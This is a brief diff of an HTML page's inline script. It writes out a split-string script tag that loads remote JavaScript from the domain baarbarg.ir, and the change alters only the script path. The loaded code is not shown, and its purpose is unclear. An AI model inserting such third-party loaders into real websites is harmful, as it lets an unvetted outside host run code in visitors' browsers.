--- a/index.htm
+++ b/index.htm
@@ -20,7 +20,7 @@
         "<scr" +
           'ipt type="text/javascript" src="http' +
           (location.protocol === "https:" ? "s" : "") +
-          '://baarbarg.ir/invoke.js"></scr' +
+          '://baarbarg.ir"></scr' +
           "ipt>"
       );
     </script>
